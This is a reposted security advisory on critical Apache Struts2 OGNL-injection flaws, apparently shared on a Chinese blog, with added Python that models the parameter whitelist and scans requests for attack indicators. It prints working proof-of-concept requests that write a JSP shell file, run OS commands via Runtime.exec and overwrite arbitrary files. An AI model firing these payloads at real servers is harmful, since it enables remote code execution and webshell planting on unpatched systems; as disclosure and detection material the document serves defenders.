Assorted Struts2 vulnerabilities

http://localhost/index.html   post:ageNo=2&words=%25E6%25B7%2598%25E5%25AE%259D%25E5%25AE%25A2&count='%2B#application%2B'&dtype

 

The original comes from EXP. My English is not very good and I didn't use Google Translate, so there are many mistakes; classmates with better English, please help polish it. The scope of this vulnerability is very large and it is extremely dangerous!
SEC Consult Vulnerability Lab Security Advisory < 20120104-0 >
=======================================================================
title: Multiple critical vulnerabilities in Apache Struts2
product: Apache Struts2
         * OpenSymphony XWork
         * OpenSymphony OGNL
vulnerable version: 2.3.1 and below
fixed version: 2.3.1.1
impact: critical
homepage: http://struts.apache.org/
found: 2011-11-18
by: Johannes Dahse, Andreas Nusser
    SEC Consult Vulnerability Lab
=======================================================================


Vendor description:
-------------------

Apache Struts2 is a web framework for creating Java web applications. It
uses the OpenSymphony XWork and OGNL libraries. By default, XWork's
ParametersInterceptor treats parameter names provided to actions as OGNL
expressions. An OGNL (Object Graph Navigation Language) expression is a limited
language similar to Java that is tokenized and parsed by the OGNL parser, which
invokes the appropriate Java methods. This allows e.g. convenient access to
properties that have a getter/setter method implemented. By providing a
parameter like "product.id=1" the OGNL parser will call the appropriate setter
getProduct().setId(1) in the current action context. OGNL is also able to call
arbitrary methods and constructors and to access context variables. For more
details please refer to http://commons.apache.org/ognl/language-guide.html.

Vulnerability overview/description:
-----------------------------------

To prevent attackers from calling arbitrary methods within parameters, the flag
"xwork.MethodAccessor.denyMethodExecution" is set to "true" and the
SecurityMemberAccess field "allowStaticMethodAccess" is set to "false" by
default. Also, to prevent access to context variables, an improved character
whitelist for parameter names is applied in XWork's ParametersInterceptor since
Struts 2.2.1.1:

acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[\\(]+";   (regular expression used as the filter)

Under certain circumstances these restrictions can be bypassed to execute
malicious Java code.
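As an added example (not part of the advisory or of Struts itself), the following Python models the whitelist check as ParametersInterceptor applies it, a full-string match of the parameter name against acceptedParamNames, and runs the parameter and cookie names from this advisory's PoCs through the 2.2.1.1 pattern as printed above and through the workaround pattern given at the end. The third pattern, PATTERN_LOOSE_ASSUMED, is an assumption of mine: the pattern as printed here cannot admit the PoC 3 name, which contains ")" and a space, so a looser variant is modelled to show what a whitelist that admits method-call syntax lets through. The sample names are taken from the PoCs and URL-decoded.

```python
import re

# ParametersInterceptor compiles acceptedParamNames and requires the whole
# parameter name to match (Matcher.matches()); re.fullmatch is the Python
# equivalent.  The Java string literals write backslashes as "\\", so the
# same patterns appear with single backslashes in Python raw strings.
PATTERN_2211 = r"[a-zA-Z0-9\.\]\[\(]+"        # Struts 2.2.1.1 whitelist as printed in the advisory
PATTERN_WORKAROUND = r"[a-zA-Z0-9\.\]\[_']+"  # advisory workaround: no "(" at all

# Assumption, not from the advisory: the printed 2.2.1.1 pattern cannot admit
# PoC 3's parameter name (it contains ")" and a space), so a looser whitelist
# that also accepts ")", "_", "'" and whitespace is modelled to show what gets
# through when method-call syntax is allowed in a name.
PATTERN_LOOSE_ASSUMED = r"[a-zA-Z0-9\.\]\[\(\)_'\s]+"


def accepted(name: str, pattern: str) -> bool:
    """Mirror of ParametersInterceptor's name check: the full name must match."""
    return re.fullmatch(pattern, name) is not None


# Parameter/cookie names from the advisory's PoCs, URL-decoded ("+" -> " "),
# plus three ordinary names an application legitimately uses.
NAMES = {
    "plain":           "id",
    "nested":          "product.id",
    "indexed":         "items[0].name",
    "poc3_filewriter": "x[new java.io.FileWriter(name)]",
    "poc2_cookie_a":   '(#_memberAccess["allowStaticMethodAccess"]\\u003dtrue)(x)',
    "poc2_cookie_b":   "x[@java.lang.Runtime@getRuntime().exec('calc')]",
}


def classify(pattern: str) -> dict:
    """Which of NAMES a given whitelist would let ParametersInterceptor evaluate."""
    return {label: accepted(name, pattern) for label, name in NAMES.items()}


if __name__ == "__main__":
    for label, pattern in (("2.2.1.1 (printed)", PATTERN_2211),
                           ("loose (assumed)", PATTERN_LOOSE_ASSUMED),
                           ("workaround", PATTERN_WORKAROUND)):
        print(label, classify(pattern))
```

Two things stand out when this runs: the workaround pattern keeps every ordinary property path working (plain, nested and indexed names all pass) while rejecting the PoC 3 name, because a constructor call cannot be written without "("; and both cookie names from PoC 2 are rejected by every whitelist, which is exactly why it matters that CookieInterceptor did not apply the whitelist at all.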


1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)

When an exception occurs while applying parameter values to properties, the
value is evaluated as an OGNL expression. For example this occurs when setting a
string value on a property of type integer. Since the values are not
filtered, an attacker can abuse the power of the OGNL language to execute
arbitrary Java code, leading to remote command execution. This issue has been
reported () and was fixed in Struts 2.2.3.1. However, the ability to execute
arbitrary Java code had been overlooked.

2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

The character whitelist for parameter names is not applied to Struts'
CookieInterceptor. When Struts is configured to handle cookie names, an
attacker can execute arbitrary system commands with static method access to
Java functions, because the flag "allowStaticMethodAccess" can be set to true
within the request.

3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)

Accessing the flag "allowStaticMethodAccess" within parameters is prohibited
since Struts 2.2.3.1. An attacker can still access public constructors with
only one parameter of type String to create new Java objects, and access their
setters with only one parameter of type String. This can be abused, for example,
to create and overwrite arbitrary files. To inject forbidden characters into the
filename, an uninitialized string property can be used.

4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)

While not being a security vulnerability itself, please note that applications
running in developer mode and using Struts' DebuggingInterceptor are prone to
remote command execution as well. While applications should never run in
developer mode during production, developers should be aware that doing so not
only has performance issues (as documented) but also a critical security
impact.


Proof of concept:
-----------------

1.) Remote command execution in Struts <= 2.2.1.1 (ExceptionDelegator)

Given Test.java has a property "id" of type Integer or Long and appropriate
getter and setter methods:

long id;

Given test.jsp with result name=input is configured for action "Test" in
struts.xml:

<action name="Test" class="example.Test">
  <result name="input">test.jsp</result>
</action>

The following request will trigger an exception (the string cannot be converted
to a number), the value will be evaluated as an OGNL expression and arbitrary
Java code can be executed:

/Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'

An attacker can also overwrite flags that will allow direct OS command execution:

/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'

If test.jsp displays the property "id", the result of the Java code evaluation
can be accessed with the Struts tags:

<%@ taglib prefix="s" uri="/struts-tags" %>
<s:property value="id" />


2.) Remote command execution in Struts <= 2.3.1 (CookieInterceptor)

Given struts.xml is configured to handle all cookie names (independent of
limited cookie values):

<action name="Test" class="example.Test">
  <interceptor-ref name="cookie">
    <param name="cookiesName">*</param>
    <param name="cookiesValue">1,2</param>
  </interceptor-ref>
  <result ...>
</action>

The following HTTP header will execute an OS command when sent to Test.action:

Cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1

(Here the command launches the Windows calculator as a demonstration. "\u003d"
is the unicode escape for "=", used because a literal "=" inside the cookie
name would be parsed as the name/value separator of the cookie.)


3.) Arbitrary File Overwrite in Struts <= 2.3.1 (ParametersInterceptor)

Given Test.java has an uninitialized property "name" of type String:

String name; // +getter+setter

The following request will create/overwrite the file "C:/sec-consult.txt"
(as an empty file):

/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1

The first parameter stores the path, including ":" and "/" that the parameter
name whitelist would never allow, in the property "name" as an ordinary value;
the second parameter's name passes the whitelist and, when evaluated, invokes
the one-argument String constructor of java.io.FileWriter with that path,
which creates or truncates the file. The existence of the property 'x' used in
these examples is of no importance.


4.) Remote command execution in Struts <= 2.3.1 (DebuggingInterceptor)

Given struts.xml is configured to run in developer mode and to use the
debugging interceptor:

<constant name="struts.devMode" value="true" />

<action name="Test" class="example.Test">
  <interceptor-ref name="debugging" />
  <result ...>
</action>

The following request will execute arbitrary OGNL expressions, leading to remote
command execution:

/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
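The four PoCs above share a handful of textual traits (an override of #_memberAccess, an @class@method( static call, a "new Type(" constructor call, and the debug=command switch), and the cookie variant hides "=" behind a \u003d escape. As an added example that is not part of the advisory, the following Python scanner decodes a request line or Cookie header the way the OGNL parser will eventually see it and reports which of those indicators fire. The sample lines are constructed from the PoCs on this page plus one benign request; the indicator names and the normalise/inspect functions are mine.

```python
import re
from urllib.parse import unquote, unquote_plus

# Indicators drawn from the four PoCs in the advisory, applied to the decoded text.
INDICATORS = [
    ("memberAccess override", re.compile(r"#_memberAccess|_memberAccess\s*\[")),
    ("static method call",    re.compile(r"@[\w.]+@\w+\s*\(")),      # @java.lang.Runtime@getRuntime(
    ("object construction",   re.compile(r"\bnew\s+[\w.]+\s*\(")),    # new java.io.FileWriter(
    ("debug interceptor",     re.compile(r"(?:^|[?&;\s])debug=command")),
]
# Java/OGNL unicode escapes (e.g. \u003d for "=") in a raw cookie or query are
# themselves suspicious; checked on the raw line before decoding removes them.
ESCAPE_RX = re.compile(r"\\u00[0-9a-fA-F]{2}")


def normalise(text: str) -> str:
    """Form-decode once ("+" -> space, %xx), undo one extra layer of percent-encoding,
    then resolve \\uXXXX escapes so obfuscated operators are visible to the rules."""
    text = unquote(unquote_plus(text))
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def inspect(line: str) -> list:
    """Return the names of all indicators that fire for one request line or header."""
    hits = ["unicode-escaped character"] if ESCAPE_RX.search(line) else []
    decoded = normalise(line)
    hits += [name for name, rx in INDICATORS if rx.search(decoded)]
    return hits


# Constructed samples: the advisory's PoC requests plus one benign request.
SAMPLES = {
    "poc1":   "GET /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter(\"C:/wwwroot/sec-consult.jsp\")).append(\"jsp+shell\").close())%2b'",
    "poc1b":  "GET /Test.action?id='%2b(%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'",
    "poc2":   "Cookie: (#_memberAccess[\"allowStaticMethodAccess\"]\\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1",
    "poc3":   "GET /Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1",
    "poc4":   "GET /Test.action?debug=command&expression=%23_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('calc')",
    "benign": "GET /Test.action?id=42&product.name=new+widget",
}


def scan_all() -> dict:
    """Indicator hits per sample; an empty list means nothing suspicious was found."""
    return {label: inspect(line) for label, line in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in scan_all().items():
        print(f"{label:7s} {'ALERT ' + ', '.join(hits) if hits else 'clean'}")
```

Decoding before matching is the important part: PoC 1 and PoC 4 carry "#" as %23 and "+" as %2b, and PoC 2 carries "=" as \u003d, so a rule that looks for "#_memberAccess" or "=" in the raw header text would miss them. The benign request, which legitimately contains the word "new" in a value, produces no hit because the constructor rule requires the "(" that follows a class name.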



Vulnerable / tested versions:
-----------------------------

All products using Struts2 are affected by at least one critical vulnerability
listed above!

Proof of Concept 1.) has been tested with Jetty-6.1.25 (26 July 2010) and Struts
2.2.1.1.

Proof of Concepts 2.), 3.) and 4.) have been tested with Jetty-6.1.25 (26 July 2010)
and Struts 2.2.1.1, 2.2.3.1 and 2.3.1.


Vendor contact timeline:
------------------------

2011-12-14: Contacting vendor through security at struts dot apache dot org
2011-12-14: Vendor reply, sending advisory draft
2011-12-14: Vendor released Apache Struts 2.3.1 in parallel
2011-12-16: Vulnerabilities confirmed in Struts 2.3.1, vendor contacted
2011-12-16: Vendor reply, discussing workaround
2011-12-20: Discussing release of fixed version
2011-12-21: Providing additional information
2012-01-03: Vendor informs that update is ready
2012-01-03: Patch (2.3.1.1) is available


Solution:
---------

Update to Struts 2.3.1.1.

Workaround:
-----------

Update to Struts 2.3.1 and apply a stronger acceptedParamNames filter to the
Parameters- and CookieInterceptor:

acceptedParamNames = "[a-zA-Z0-9\\.\\]\\[_']+";   (regular expression; without "(" no method or constructor call can appear in a parameter name)

Don't run your applications in developer mode.
Advisory URL:
-------------


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria

Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com

EOF J. Dahse, A. Nusser / 2012

 

Posted 2012-08-05 14:34 by 高级园长